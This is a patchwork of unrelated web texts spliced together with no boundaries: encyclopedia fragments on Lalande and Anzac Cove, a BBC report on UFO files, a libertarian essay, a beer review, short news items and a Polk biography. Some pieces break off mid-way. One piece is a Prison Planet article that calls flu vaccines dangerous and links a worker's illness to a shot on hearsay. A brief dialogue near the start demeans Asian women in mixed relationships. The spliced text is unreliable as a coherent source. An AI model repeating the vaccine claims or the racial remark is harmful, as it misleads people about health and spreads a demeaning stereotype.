In February 1847 Sears C. Walker of the US Naval Observatory was searching historical records and surveys for possible prediscovery sightings of the planet Neptune that had been discovered the year before. He found that observations made by Lalande's staff in 1795 were in the direction of Neptune's position in the sky at that time and that Neptune might appear in the observation records. On 8 May and again on 10 May 1795 a star was observed and recorded with uncertainty noted on its position with a colon, this notation could also indicate an observing error so it was not until the original records of the observatory were reviewed that it was established with certainty that the object was Neptune and the position error between the two nights was due to the planet's motion across the sky. The discovery of these records of Neptune's position in 1795 led to a better calculation of the planet's orbit.
Awards and recognition [ edit ]
Notable works [ edit ]
Voyage d'un françois en Italie, fait dans les années 1765 et 1766. Tome premier, 1769 , 1769
His published include:
He communicated more than one hundred and fifty papers to the French Academy of Sciences, edited the Connoissance de temps (1759–1774), and again (1794–1807), and wrote the concluding two volumes of the 2nd edition of Montucla's Histoire des mathématiques (1802).
See also [ edit ]
Notes [ edit ]
References [ edit ]
Attribution
David Kim: There's this commonly held myth that's lately been propagated in American society that white males are acting on some sort of " Asian fetish " that's a byproduct of this country's postcolonial history which leads to an inclination (by white males) to date Asian girls... I don't buy it. After all, what about the other half of the relationship? Even if all of that crap were true, how would this explain why an Asian girl would want to date a white male? Is she not an independent actor in this equation? Is there some postmodern psychobabble that explains a latent desire for her to date someone who ostensibly represents a former colonial master?Christy Smith: Most of the Asian girls that end up with white guys are pretty ugly and most of the white guys in these relationships are douches. By the way, I'm going to start a AMWF forum on Facebook. Will you join?David Kim: Okay!
Media playback is unsupported on your device Media caption Watch: UFO expert Dr David Clarke gives his explanation for the sighting in Sri Lanka by an RAF officer
Intelligence papers on a reported UFO sighting known as the "Rendlesham incident" have gone missing, files from the National Archives reveal.
The missing files relate to a report of mysterious lights from US servicemen at RAF Woodbridge in Suffolk in 1980.
The disappearance came to light with the release of 8,000 previously classified documents on UFOs.
Officials found a "huge" gap where defence intelligence files relating to the case should be, the papers show.
Russian rocket
The documents are the latest MoD files on UFOs released into the National Archives which will be free to access on its website for a month.
There is nothing to convince Her Majesty's government that there has ever been a single visit by an alien spacecraft Lord Stabolgi, Government spokesman Is the truth out there?In pictures: UFOs in the UK
Photographs and sketches of UFOs made by members of the public are included, as well as their eyewitness reports.
Among the documents is testimony from an airline pilot and his son who say they spent five minutes watching an object made up of three circles fly past their garden in Hellingly, East Sussex.
The pilot reported it to Air Traffic Control in West Drayton, and an official labelled his sighting as one by "a credible witness".
But another defence official later wrote a memo saying the report "contains nothing of air defence significance".
More attention is given to the crew of an RAF Tornado who encountered an object the size of a C130 Hercules transport aircraft while flying over the North Sea in 1990.
The pilot describes flying at Mach 0.8 but being overtaken by an aircraft the like of which he had never seen before.
He talks about lights and even "an engine area" but the files also show how a possible explanation emerges - a Russian rocket booster was re-entering the earth's atmosphere on that same night.
Image caption The RAF was flooded with calls about small "flying saucers" found across southern England in 1967
Another file released reveals six small "flying saucers" were found by members of the public in locations across southern England in 1967. Four police forces and the army were mobilised before it emerged the incident was a rag-day hoax by engineering students from Farnborough Technical College.
There is also a report from a London man who believed he may have been abducted by aliens.
Minister's request
The files reveal that key documentation relating to the Rendlesham Forest incident has disappeared.
Some UFO researchers believe the episode, which happened over two nights in 1980 is a classic example of a "close encounter".
The incident took place near the fence of RAF Woodbridge - at that time being used by the US Air Force. A group of servicemen reported seeing strange lights in the trees near the base and after investigating found marks on the ground and damage to vegetation.
The files reveal the MoD received a request for its own records of the incident in 2000, but when officials looked they discovered a "huge" gap where defence intelligence files relating to it should be.
Image caption Crop circles provoked this sketch by a member of the public
The hunt generated a series of notes, with one official speculating that the files could have been taken home by someone and another remarking that "it could be interpreted to mean that a deliberate attempt had been made to eradicate the records covering this incident".
However, among intelligence papers released in 2009, it was revealed that former Admiral of the Fleet Lord Hill-Norton wrote to the defence secretary about the incident in 1985, speculating that an unauthorised aircraft may have entered and left UK airspace at the time.
But it is not the only gap in the official record. In 2002 the MoD received a request for information from Lord Hill-Norton. He wanted to know about reports of a UFO sighting made by HMS Manchester while on exercise in the 1990s.
It emerged in the file that HMS Manchester's log for one of the periods was lost overboard after "a gust of wind" and the vessel's captain cannot remember anything unusual taking place.
Natural explanations
This latest tranche of documents covers not just people who contacted the Ministry of Defence after seeing lights or objects, but also sheds some light on official thinking about this aspect of the paranormal.
Concern about UFOs and what they might be gone up to senior level and lasted several years.
Officials were dismayed when in 1977 the then Prime Minister of Grenada Sir Eric Gairy wanted to call for the United Nations to set up a unit to investigate the phenomenon.
Image caption Sketches of UFOs are among the files released by the National Archives
The files show how Britain was concerned the idea would drag the UN into disrepute. The premier was persuaded to withdraw his proposal but went on to call for 1978 to be designated "the year of the UFO". He was deposed in a coup the following year.
UFOs have only ever received one debate in Parliament. It came in the House of Lords in 1979, at the height of the "winter of discontent", and the files show how officials laboured to prepare a government position on the topic.
At the end of the discussion the government spokesman Lord Stabolgi summed up what remains the official position now.
"There is nothing to convince Her Majesty's government that there has ever been a single visit by an alien spacecraft. As for telling the public the truth about UFOs, the truth is simple.
"There really are many strange phenomena in the sky, and these are invariably reported by rational people. But there is a wide range of natural explanations to account for such phenomena."
Making Liberty Happen
Jason Kuznicki's lead essay posits two kinds of libertarian activism: the usual sort of gratifying but ineffective moral suasion (with Ayn Rand's work cited as an example) and “libertarian social engineering.” Framing it as a choice between futile theory or transformative practice, Kuznicki calls for less of the former and more of the latter.
Kuznicki offers the Dominant Assurance Contract (DAC) as exactly the sort of thing that the world needs more of. On that point, I wholeheartedly agree. Alex Tabarrok deserves a Nobel Memorial Prize in Economic Sciences for his pioneering work on the DAC, an idea that has already survived field testing and that, if scaled up, stands to revolutionize the provision of public goods.[1] As Kuznicki notes, the DAC could render nation states obsolete.
Powerful stuff. Powerful good stuff, too, for friends of liberty. So Kuznicki wants more of the same, and pronto. But what about the moral theorizing he seems to dismiss? Does it play any role in the brave new world of practical libertarianism?
Beyond Theory?
Kuznicki calls for a kind of “social engineering.” Though not the most politic name, it does reveal a profound regard for theory. What do engineers do, after all, but translate theory into practice? Bridges stand because civil engineers apply the Newtonian model of physics to real world facts; computer chips run well because electrical engineers apply the quantum model to semiconductors.
Kuznicki's call for more libertarian engineering thus includes an invitation to libertarian theory. And not just any theory. A practical fellow like Kuznicki will want a theory that, like Newtonian or quantum physics, does a good job of describing its domain. Kuznicki evidently doubts that Objectivism will do the trick, but beyond that, his essay does not go. On it rushes, to the attractions of practical libertarianism.
And so, too, will this essay. But not before noting that Tabarrok's DAC exemplifies the theory that consensual market exchanges maximize social welfare. This shows in the very motive for creating the DAC: to offer a purely voluntary and private mechanism as a better alternative to the political provision of public goods. Tabarrok's description of the DAC offers more in the line of mathematical equations than philosophical theorizing, but the whole of his enterprise coheres with the theory that the more consent, the better.[2]
Libertarian Coders of the World: You, Write!
Now, to Kuznicki's main concern: mobilizing libertarians to design institutions that respect individual rights, promote economic growth, and cultivate social harmony. Who could disagree with that? So Kuznicki hits the gas. He concludes, “if these institutions can be built voluntarily, then presumably they can also be built today.”
That twee “if” marks a significant turn of argument, however. In terms of physics, seasteaders can (sort of, probably) build entirely autonomous floating islands on the high seas. In terms of finances or politics, though? Kuznicki's libertarian engineers will never get a chance. That is one reason why The Seasteading Institute decided to work with French Polynesia to create a Floating Island Project in the shallow waters of one of that island nation's sheltered lagoons.
Kuznicki calls for libertarians to code the software of liberty. Well and good. It will come to little, though, if they have no hardware to run it on. And applications that “run on top” of existing institutions, the way that Bitcoin operates above and beyond the reach of any particular government, can only get so far in the virtual world. Internet clouds eventually come to ground on sovereign territory.
Seasteads might soon offer suitable platforms for trying out new and better ways of providing consent-rich governing services. Or maybe Honduran ZEDES, or the fledgling Liberland, or another of the contemplated special jurisdictions will provide the hardware necessary for running the kind of software that Kuznicki wants libertarians to start writing. Here, it must suffice to say that hardworking people have been trying to make it happen—and to offer the pragmatic reminder that these things take time.
Quick Answers to Hard Questions
Kuznicki warns friends of liberty that if they want to sell new and improved kinds of government, they will have to answer some tough questions:
What happens if there's a murder? How will property title disputes be adjudicated? What if someone doesn't agree with the judgment? How will banking work? When pollution or other externalities occur, who deals with them, and how? In short, who provides public goods? With what resources? And by what authority?
He is not the first to make such inquiries. Again: hardworking people have been seeking answers for quite a while, in venues all over the world. Speaking solely as an individual academic and not for any client, here follows a sketch of one general approach to private governing services.
It combines three main elements:
Shared ownership;
Double democracy; and
Open source law.
Shared Ownership. Because nobody owns traditional political institutions, nobody really cares for them. Resident-owned communities offer a better alternative. Private governments can learn from the commercial corporate world, where intense competition has driven the evolution of institutions capable of supporting large, complex, and consent-rich communities. Your next government might thus resemble a city-sized corporation, with you and other residents buying shares, electing the board of directors, and so forth. Think of it as residential co-op, upgraded for the big leagues.
Private governments cannot simply adopt the Model Business Corporation Act or Delaware Corporation Law, however. Commercial corporate codes aim at protecting shareholder rights—not residents' liberties. How can private governments best protect individual rights?
Double Democracy. Political institutions typically offer to protect individual rights via official declarations. These proclaim various wonderful things, which ultimately mean nothing more than what paid agents of government decide. Ahem. Rather than offering yet another catalog of rights, therefore, private governments should simply offer a blanket “Most Free Person” guarantee—and leave its interpretation to truly independent, third party judges, chosen via methods commonplace in private arbitrations.
Better than even words, though? Structural protections of individual rights. Like democracy, but more so. Double democracy.
In double democracy, owners manage the community on a one share/vote basis while residents enjoy the power to veto select laws or officers on a one person/vote basis. Owners construct; residents correct. Double democracy provides a structural safeguard against offensive governments without opening the door to mob rule. Both shareholders' property rights and residents' individual rights get represented in double democracy.[3]
Open Source Law. And where will the law of private governments come from? Not from any one flag, but entirely from private, non-governmental sources. Not owned by anyone, but free to all, like GNU/Linux open source computer operating software. Hence Ulex, the open source legal operating system.[4]
Conclusion
Kuznicki's essay voiced little patience for idle theorizing. He called for libertarians to get to work writing, in effect, social software. Kuznicki had lots of questions about how private governments will work, too. This essay defended theory, counseled patience to eager Kuznicki, and offered a quick sketch of what his next government might look like.
Notes
[1] Alexander Tabarrok, “The private provision of public goods via dominant assurance contracts,” I 96: 345–362, 1998, https://mason.gmu.edu/~atabarro/PrivateProvision.pdf.
[2] For a consent-based theory about the design and justification of social institutions, see Tom W. Bell, Your Next Government? From the Nation State to Stateless Nations (Cambridge University Press, forthcoming 2017).
[3] Tom W. Bell, “What Can Corporations Teach Governments About Democratic Equality?” 31 Social Philosophy & Policy 230 (2015), https://ssrn.com/abstract=2622627.
[4] Your Next Government?, cited at [2], offers more about Ulex; version 1.1 can be read here.
Obama's claim that vaccines will be voluntary deceptive and misleading as thousands of professionals face losing their jobs
Paul Joseph Watson
Prison Planet.com
Tuesday, September 22, 2009
A daycare worker employed by Northeast Health in Albany New York was shocked to be told by her boss that she would be fired if she refused to take a seasonal swine flu shot on the spot. Similar stories have been pouring in to us from all over the country as fears that the upcoming H1N1 shot will also be mandatory continue to grow.
The case emphasizes why President Obama's claim that the swine flu shot will be voluntary is completely deceptive and misleading. Americans across the country, even those not directly connected with health care work, are being ordered to take the mandated seasonal and swine flu shots or lose their jobs.
The story of what happened to the daycare worker, who would like to go by the pseudonym “Clare,” was sent to us by her sister who also provided Clare's real name and the full name of the facility she is employed with.
Clare works in a daycare center which is affiliated with the local hospital but in a completely separate building. It was reported earlier this month that all hospital workers in the entire region would be forced to take the seasonal flu shot or lose their jobs and that the vaccine would become a condition of employment.
“On the Tuesday morning following the Labor Day weekend (Sept 8th), the director of the daycare of Northeast Health announced to employees on the spot (without a meeting, memo or discussion) that everyone had to go get a flu shot immediately and staff would be rotated so that everyone would be inoculated by the end of the day,” writes Clare's sister.
“Clare said “I don't get flu shots” and was told “well then you'll be fired.”
The director told Clare that the H1N1 shot would also be mandated in the same way when it becomes available. When Clare warned the director that the swine flu shot contained mercury, squalene and other dangerous additives, the director told her that regardless of her objections, if she refused to be vaccinated she would be suspended from November 13th and then formally fired on November 30th.
“Clare asked how she can be fired for something that was not a condition of her employment when she was hired? She was told it was not Northeast Health's policy, it was the director of the New York State Department of Health who made the shot mandatory,” writes her sister.
However, according to the NYSDOH decree for mandatory vaccinations, exemptions exist for “personnel who have a medical contraindication and for workers, such as those offsite, who would have no contact with patients and only incidental contact with direct-care staff.” Clare clearly falls into this category as she works in a separate building from the hospital and has no direct regular contact with hospital workers.
(ARTICLE CONTINUES BELOW)
Clare demanded answers to the following questions, none of which have been addressed by the daycare director.
1. The regular seasonal flu hasn't even hit so how will this first mandate shot provide any immunity when it is clearly the vaccine from last year? 2. When the H1N1 is mandated – as I believe it will be – and if I did get the shot to save my job and should I have one of the adverse reactions that the CDC has predicted, will I be covered under Workers Comp since the action that caused the injury was job related? (The cost of which will fall on the employer NOT the State of New York.) 3. Should I refuse the shot will I be eligible for Unemployment Compensation since I did nothing to warrant being terminated? 4. Malpractice insurance providers in Australia are refusing to extend coverage to their clients who give the shot; will this be the case in New York? 5. Are insurance companies going to cover subscribers who fall ill as a result of the H1N1 inoculations that were mandated by the NYS Department of Health?
After concerned parents started to ask Clare why she was leaving, it some became apparent that the director had immediately produced a letter and circulated it around the daycare, claiming that Clare was leaving for “personal reasons,” without mentioning the real reason, that she refused to take the vaccine.
Clare took the letter to the head of human resources but was told that, “the New York State Labor Department would probably be instructed to side with the Department of Health and determine that you were fired for not following an order from your employer and not approve Unemployment Compensation. The meeting ended with him stating that it was the NYS Department of Health's call and not Northeast Health and there was no way around it.”
“Not only have my sister's rights as an employee been violated but her employer's justification for terminating her is based on a falsehood on top of which she may be prevented from receiving Unemployment Insurance for this wrongful termination,” writes Clare's sister.
As an addendum, Clare's sister informs us that one of the daycare teachers who did take the seasonal flu shot on September 8th suffered a reaction less than a week later. Clare's sister takes up the story;
“It began with symptoms similar to Pink Eye on her left side and then her eye swelled; the swelling then spread further down her check and then into her neck where a mass formed. This 30 year old mother of three has been unable to work since the symptoms in her eye surfaced, around the 14th. My sister Clare asked school officials if her ill coworker would be covered by Workers Comp and was told they believe she would be. The co-worker has been on antibiotics that don't seem to be working. Her doctor told her if the RX doesn't clear it up the “infection(?)” soon they'll have to take more drastic action. My sister was told by her ill co worker: “Clare you were right to say no to the shot, the job isn't worth it, I should never have gotten the shot.”
Clare is now facing unemployment as a result of refusing to take the seasonal flu vaccine, not to mention the H1N1 shot. Thousands of other health workers are now in a similar position whereby they will be forced to take the dangerous swine flu shot or be fired over the course of the next few weeks. Polls indicate that at least a third of nurses and health workers will refuse to take the vaccine and another third are still unsure. If even as little as a quarter of health care professionals stand up in unison and refuse to be intimidated into taking the shot, authorities will probably have to back off and make the shot voluntary.
However, Clare's deeper concern is that another primary target of the first round of swine flu vaccinations, young children, will be even more vulnerable to having the shot forced upon them with no warning or notice whatsoever.
“My sister has three children in public school and is extremely concerned that the head of the New York State Department of Health, Dr. Richard Daines, will next decree the shots are mandatory for all school children,” writes Clare's sister.
“She is prepared to home school them but is scared to death that in the meantime an UNANNOUNCED flu shot clinic will be sprung on school districts some morning to get around parental objections to having their children vaccinated. She has told her children in no uncertain terms are they to accept the shot(s) but realizes the Hobson's choice they too may soon face and that they are so much less prepared than she to fight this unconstitutional authority.”
This article was posted: Tuesday, September 22, 2009 at 5:27 am
Print this page.
Infowars.com Videos:
Comment on this article
Popular belief is that if Apple does end up releasing their long-rumored smart TV, they'll call it the iTV… but there are problems with that, not least of which is that there are at least two companies out there called iTV who are threatening to sue if Apple does so.
So what will they call it? Analyst Peter Misek — who believes the Apple TV is imminent — thinks it'll be called the iPanel, and Apple will be building up to 5M of them starting in May.
Why iPanel? It's absurd, but Misek does have a point that calling it an iTV is very limited in scope where as an actual Apple HDTV would be able to do a lot more than what we traditionally think of televisions doing.
“It is a display, gaming center, media hub, computer, home automator, etc.,” Misek said. “Also, Apple would likely have difficulty getting naming rights from the UK TV network ITV.”
Fair enough, although that sounds so tin-eared and tone-deaf we're willing to bet Apple wouldn't name anything an iPanel.
Misek's other predictions are a little weird. He says that the Apple television will retail for $1,250 and bring in 30 percent gross margins. He also says that Sharp is shipping its IGZO panels to Apple for use in the iPanel, but that's pretty unlikely: IGZO is effectively a power efficiency technology that allows displays to be brighter and have richer colors while using less power. That's great, but it's not ready for prime time yet, and Sharp's yet to be able to maintain yields on panels produced using the tech. Plus, a TV is plugged in all the time, minimizing the returns on IGZO panels.
Personally, as certain as Misek sounds, we'd take all of this with a grain of salt, at least for the time being. What do you think?
Today Chris, Mathew, and I are reviewing Anchor Steam Beer. I was recently reading the book Home beermaking: The complete beginner's guidebook and there was a section in the book talking about “steam beer”.
Steam beer, the only native American beer style, was born in late 19th century San Francisco, when refrigeration and ice were unavailable to Eastern immigrants accustomed to lager brewing. Desiring local beer, they brewed with lager yeast at (unrefrigerated) temperatures, producing a robust, highly hopped (partly for preservation reasons) brew more like an ale than a lager in flavor, yet with a unique sharp character imparted by the warm fermenting lager yeast. Unlike most draft beers at the time, steam beer was carbonated (by krausening), and the hissing noise issuing from a freshly-tapped keg probably gave rise to the name steam.
That is a nice piece of history, but it's the next part that caught my eye:
Today, steam is a trademark of Anchor Brewing Company in San Francisco.
I find that funny simply because the top of their bottle states:
…Anchor alone has used the quaint name “steam” for its unique beer.
With all the fanfare, we figured we give the beer a try.
In our ongoing review series we'll be covering the following 5 items:
Appearance
Aroma
Mouthfeel
Flavor
Aftertaste
Here is a quick guide for the beginner http://indybeers.com/beer-tasting-guide/. At the bottom of that page is an HTML template that can be used in our comments if you would like to post your own reviews along with us.
About Anchor Brewing:
Based out of San Francisco, CA they have roots in the area that go back to 1849. I was going to post more information about them, but I really hate their website. The “Our Craft” and “Our History” sections are bad. The guys over at Aleheads should consider using it in their “worst brewery websites” series.
Twitter: https://twitter.com/#!/AnchorBrewing
Facebook: http://www.facebook.com/anchorbrewing
Appearance
Scott: There was a slight cloudiness to the beer. It had a good golden/amber color. I must have poured mine wrong (or right depending on your personal thoughts) because I got almost no head. My second beer I poured with a heavy hand to get a nice thick, creamy head.
Chris: The body was a cloudy shade of amber. Pouring this beer differently changed the appearance. If you slowly poured it into a glass it had almost no head. If you didn't baby it, the head was a fluffy off white that lasted throughout the entire glass. Lots of bubbles floated up from the bottom as carbonation was plentiful.
Mathew: There was a small head but seemed to vary a lot with everyone's pour. It was also very bubbly and not creamy like the description says. The color was a light Amber with a slight cloudiness to it. There seemed to be a large amount of carbonation as there was a continued bubble stream from the bottom of the glass, like a soda, the whole time I was drinking it.
Aroma
Scott: Not much on the nose. Maybe some hints of malt and grass.
Chris: The aroma was very mild. Hints of grain and sweetness were noticable but faint.
Mathew: There was not a lot of aromas and it was hard to distinguish.
Mouthfeel
Scott: Very crisp and smooth. Lots of light carbonation across the tongue.
Chris: Medium-bodied with abundant carbonation.
Mathew: There was a large amount of carbonation leaving a bubbly feeling on the tongue, like champagne.
Flavor
Scott: As with everything else, light in flavor, but that's not a bad thing. It has a very approachable quality to it. Unquestionably easy to drink. I could see myself putting back more than a couple of these.
Chris: I was very happy with this beer. It had a clean, lightly sweet caramel taste with no hoppy bitterness.
Mathew: It had a light beer taste with a hint of wheat but was not strong with any flavors.
Aftertaste
Scott: Nothing too much on the backend. Mathew mentioned that it had a bitter aftertaste, but I think that is only in comparison to the mild flavor of the beer to begin with. Held against any other beer it wouldn't be considered as bitter.
Chris: I didn't pick up on much of an aftertaste.
Mathew: At first it seemed to leave a sticky dry aftertaste but as I moved to my second one that went away and it have the taste and feel of a light lager.
Final Thoughts
Scott: At $9.99 a six pack I won't be rushing to drink a lot of these; however, if I find myself looking for something easy to drink, and this is part of my selection from which to choose, I would happily drink a few more. I'll give it a 3.5 out of 5.
Chris: Above I noted that it didn't have much of an aftertaste. Beyond this being a clean-light beer it was so easy to drink and found myself going through one very quickly. I like trying new beers and this one was a good one. Its mild palate makes it and easy to drink. I'll give it a 4 out of 5.
Mathew: The beer was not bad, it was supposed to beer a mix of an ale and lager, I didn't really get that as I am a big ale and lager fan. I think it more had the mix of a light beer with a hint of Champagne. I would drink again but would not order at a bar. I would rate it 3.5 out of 5 with a 2.5 out of 5 on the manufactures description.
Coordinates:
Anzac Cove looking towards Arıburnu, 1915
Anzac Cove (Turkish: Anzak Koyu) is a small cove on the Gallipoli peninsula in Turkey. It became famous as the site of World War I landing of the ANZACs (Australian and New Zealand Army Corps) on 25 April 1915. The cove is 600 metres (2,000 ft) long, bounded by the headlands of Arıburnu to the north and Little Arıburnu, known as Hell Spit, to the south. Following the landing at Anzac Cove, the beach became the main base for the Australian and New Zealand troops for the eight months of the Gallipoli campaign.
Gallipoli Campaign 1915-6 [ edit ]
The first objective for soldiers coming ashore in enemy-held territory was to establish a beachhead, that is a safe section of beach protected from enemy attack where supplies and extra troops could be safely brought ashore.
Anzac Cove was always within 1 kilometre (3,300 ft) of the front-line, well within the range of Turkish artillery though spurs from the high ground of Plugge's Plateau, which rose above Arıburnu, provided some protection. General William Birdwood, commander of Anzac, made his headquarters in a gully overlooking the cove, as did the commanders of the New Zealand and Australian Division and the Australian 1st Division. It was on 29 April that General Birdwood recommended that the original landing site between the two headlands be known as "Anzac Cove" and that the surrounding, hitherto nameless, area occupied by his corps be known as "Anzac".
Australian 4th Battalion troops landing in Anzac Cove, 25 April 1915
The beach itself became an enormous supply dump and two field hospitals were established, one at either end. Four floating jetties were quickly constructed for the landing of stores, later replaced in July by a permanent structure known as "Watson's Pier". The volume of stores quickly overflowed onto the adjacent beaches; firstly onto "Brighton Beach" to the south of the cove and later onto North Beach beyond Arıburnu. Three wireless radio stations were established on the beach to maintain contact with the fleet.
While the cove was relatively sheltered from shellfire from across the peninsula, the Chanak forts, as well as the Turkish battleships Turgut Reis and Barbaros Hayreddin[1] anchored in the Dardanelles, shelled the waters off the cove and it was partially exposed to view from Gaba Tepe to the south and completely open to view from Nibrunesi Point at the southern tip of Suvla Bay to the north. Nibrunesi Point was under the guns of the Royal Navy so was never used to fire on Anzac, however the well-concealed Turkish battery at Gaba Tepe, known as "Beachy Bill", was a constant menace.
Despite the shelling and Turkish snipers, Anzac Cove was a popular swimming beach for the soldiers. At ANZAC it was a struggle to supply sufficient water for drinking and there was rarely any available for washing. Most soldiers disregarded all but the fiercest shelling rather than interrupt the one luxury available to them.
Anzac Cove and surrounding area The cove with "sphinx" rock in the background
Commemorations [ edit ]
On Anzac Day in 1985, the name "Anzac Cove" was officially recognised by the Turkish government.[2] The Anzac Day dawn service was held at Arıburnu Cemetery within the cove until 1999 when the number of people attending outgrew the site. A purpose-built "Anzac Commemorative Site" was constructed nearby on North Beach in time for the 2000 service.
Over the years, Anzac Cove beach has been degraded by erosion, and the construction of the coast road from Kabatepe to Suvla, originally started by Australian engineers just prior to the evacuation of Anzac in December 1915, resulted in the beach being further reduced and bounded by a steep earth embankment. The only way onto the beach was via the CWGC cemeteries at each headland, Arıburnu Cemetery, and Beach Cemetery.
In 2003 the Australian government announced that it was negotiating with Turkey to place Anzac Cove on the National Heritage List, which included Australian sites such as the Eureka Stockade gardens. However this request was dismissed by the Turkish government as the Gallipoli peninsula is Turkish territory and already a national park in the Turkish National Park System. In 2004 the Australian Minister for Veteran's Affairs, Danna Vale, made a request to the Turkish authorities that roadworks be carried out in the area. In 2005, the resultant efforts to widen the road to provide a bus parking area for the Commemorative Site covered some of the remaining beach, making it impossible to traverse, and cut into Plugge's Plateau, making the path to the summit and Plugge's Plateau Cemetery impassable.
On 18 October 2005 the federal minister for veterans affairs, Danna Vale, called for the battlefield to be recreated in Australia, saying that the physical similarity between the end of the Mornington Peninsula, in Victoria, and Anzac Cove, in Turkey, is "uncanny".[3]
References [ edit ]
Sometimes, people want the best for others out of the kindness and love in their hearts. Other times, it's because time's come to pay up.
That seems to be the case with Verizon IndyCar Series driver Alexander Rossi, who (probably jokingly) said Tuesday that he really wants fellow driver Conor Daly to find a ride for 2018 because they're roommates who share the rent. Daly lost his IndyCar ride when his race team, A.J. Foyt Enterprises, dumped its lineup at the end of the 2017 season. He hasn't found a new one yet.
Here's what Rossi said about Daly's current situation during a fan Q&A on the Riley Children's Foundation fundraising website:
Look, Rossi, your self-advantageous intentions are in the right place here, but there are always smoother ways to put these things. You tell your boss that you hope the company exceeds its goals for the year because they deserve the nice corporate vacation that goes along with the awards ceremony, not because it means you may get a raise next year. That's just a minor and negligible bonus.
Advertisement
You also say you hope your buddy Conor gets a ride because he's worked so hard for one, not because you really don't want to toss out his half of the rent for the holiday season. It makes you look like the good person, you see.
Either way, best of luck getting your half of the rent, Rossi. If all else fails, from experience, it does help to get continual revenge by putting your roommate's spilled Fruit Loops in their unmade bed.
The personal items of beloved fashion photographer Bill Cunningham, who passed away in June 2016, will have a new home at the New-York Historical Society's permanent collection. Known for riding around Manhattan on his Biria bicycle with his Nikon camera in tow, these personal belongings, along with the blue French worker's jacket that Cunningham often wore have been donated by his former assistant and a personal friend, reports the New York Times.
The collection will also feature Cunningham's library of over 200 books, photographs, and notes along with his feather collection and tools. These items will join a series of Cunningham's photographs that were donated at an earlier time.
“It is with great pride that the New-York Historical Society becomes the new home for his earthly belongings,” said museum president Louise Mirrer.
Cunningham worked with the New York Times for more than 40 years and captured some of fashions most iconic photographs. Upon news of his passing, the city temporarily renamed the corner of East 57th Street and 5th Avenue, where often photographed, Bill Cunningham Way.
The exhibit honoring his life and work is expected to debut sometime around the spring.
The Little Rock Police Department is working an active scene at the Clinton Presidential Library for a shooting. (KATV photo/Korey Isbell)
UPDATE (11/1):
Little Rock police have identified the victim in Monday night's shooting in the Clinton Library parking lot as Jarell Johnson, 19, of Little Rock.
Police say Johnson was shot in the leg after accompanying a 16-year-old to sell five pairs of True Religion and Robbins brand jeans.
The teens told police the suspects drove up in a red four-door sedan. When they gave the suspects the jeans, one of them said, "You lose these," then fired a shot at Johnson as they drove away.
The 16-year-old drove Johnson to a local hospital, where he was treated for a gunshot wound to his left leg.
The victims identified one of the suspects as Typaris Johnson. Police have been unable to locate the individual.
--------------------------------------------------
ORIGINAL STORY (10/31):
The Little Rock Police Department is working an active scene at the Clinton Presidential Library for a shooting Monday evening, but say the shooting has nothing to do with the upcoming presidential election.
Responding officers report finding an active crime scene, but couldn't initially find a victim. Police were later able to locate a victim at a local hospital.
That person was shot in the leg, and was taken to the hospital to be treated for non-life threatening injuries.
After investigating further, police learned that two people set to meet up with three men to sell blue jeans.
The three men reportedly took the blue jeans, and shot at the two others, hitting one of them.
Police believe the motive for the shooting was robbery.
Electoral fraud charges dropped against two independent MP Cathy McGowan supporters
Updated
Electoral fraud charges against federal independent MP Cathy McGowan's niece and another supporter have been dropped.
Maggie McGowan, 28, and 24-year-old Sophie Fuchsen had been charged with giving false or misleading information to the Australian Electoral Commission (AEC) ahead of the last federal election.
The pair supported the north-east Victorian MP in the last federal election when she unseated Liberal Sophie Mirabella in a shock defeat.
They were studying in Melbourne at the time but changed their addresses on the electoral role to Indi before polling began.
Prosecutors ultimately determined the two had acted within the law by voting in the electorate.
Defence lawyers told the Melbourne Magistrates Court the women had followed advice given on the commission's website.
Outside court, defence lawyer Rob Stary said the case was a terrible waste of Australian Federal Police (AFP) and prosecution resources.
"The original complainant, whoever it was that initiated it, was quite scurrilous and unfortunately we'll never discover it as a matter of privilege," he said.
"If your family lives at a particular address, and this happens in tens of thousands of cases in Australia, people go to study temporarily outside of their family home and that's what happened in this case.
"It's curious that it just happened in Indi ... fortunately, common sense has prevailed and the charges have been withdrawn."
He said if the same case occurred across Australia, courts would be "clogged with prosecutions".
Allegations 'baseless political exercise'
Ms McGowan and Ms Fuchsen did not appear in court today.
In a statement, Maggie McGowan said it was unfortunate the AEC and AFP did not recognise the allegations as a "baseless political exercise".
Cathy McGowan welcomed the decision to strike out the charges and said her supporters never had any case to answer.
"There was no conspiracy," the Indi MP said.
"As a leader in my community I will continue to stand up for young people and I am proud to be their representative in Parliament.
"They are our future and they need to be encouraged to have their say and be part of the democratic process."
The Australian Electoral Commission has been contacted for comment.
Topics: elections, government-and-politics, law-crime-and-justice, melbourne-3000
First posted
James K. Polk. Hulton Archive/Getty Images
Life span: Born: November 2, 1795, Mecklenburg County, North Carolina
Died: June 15, 1849, Tennessee
James Knox Polk died at the age of 53, after becoming very ill, and possibly contracting cholera during a visit to New Orleans. His widow, Sarah Polk, outlived him by 42 years.
Presidential term: March 4, 1845 - March 4, 1849
Accomplishments: Though Polk seemed to rise from relative obscurity to become president, he was quite competent in the job. He was known to work hard in the White House, and his administration's great accomplishment was in extending the United States to the Pacific Coast through the use of diplomacy as well as armed conflict.
Polk's administration has always been closely linked to the concept of Manifest Destiny.
Supported by: Polk was affiliated with the Democratic Party, and was closely allied with President Andrew Jackson. Growing up in the same part of the country as Jackson, Polk's family naturally supported Jackson's style of populism.
Opposed by: Polk's opponents were the members of the Whig Party, which had formed to oppose the policies of the Jacksonians.
Presidential campaigns: Polk's one presidential campaign was in the election of 1844, and his involvement was a surprise to everyone, including himself. The Democratic Convention in Baltimore that year was unable to choose a winner between two strong candidates, Martin Van Buren, a former president, and Lewis Cass, a powerful political figure from Michigan. After rounds of inconclusive balloting, Polk's name was placed in nomination, and he eventually won. Polk was thus known as the country's first dark horse candidate.
While he was being nominated at a brokered convention, Polk was at home in Tennessee. He only found out days later that he was running for president.
Spouse and family: Polk married Sarah Childress on New Year's Day, 1824. She was the daughter of a prosperous merchant and land speculator. The Polks had no children.
Education: As a child on the frontier, Polk received a very basic education at home. He attended school in his late teens, and attended college in Chapel Hill, North Carolina, from 1816 until his graduation in 1818. He then studied law for a year, which was traditional at the time, and was admitted to the Tennessee bar in 1820.
Early career: While working as a lawyer, Polk entered politics by winning a seat in the Tennessee legislature in 1823. Two years later he successfully ran for Congress, and served seven terms in the House of Representatives from 1825 to 1839.
In 1829 Polk became closely aligned with Andrew Jackson at the outset of his administration. As a member of congress Jackson could always rely upon, Polk played a role in some major controversies of Jackson's presidency, including Congressional squabbles over the Tariff of Abominations and the Bank War.
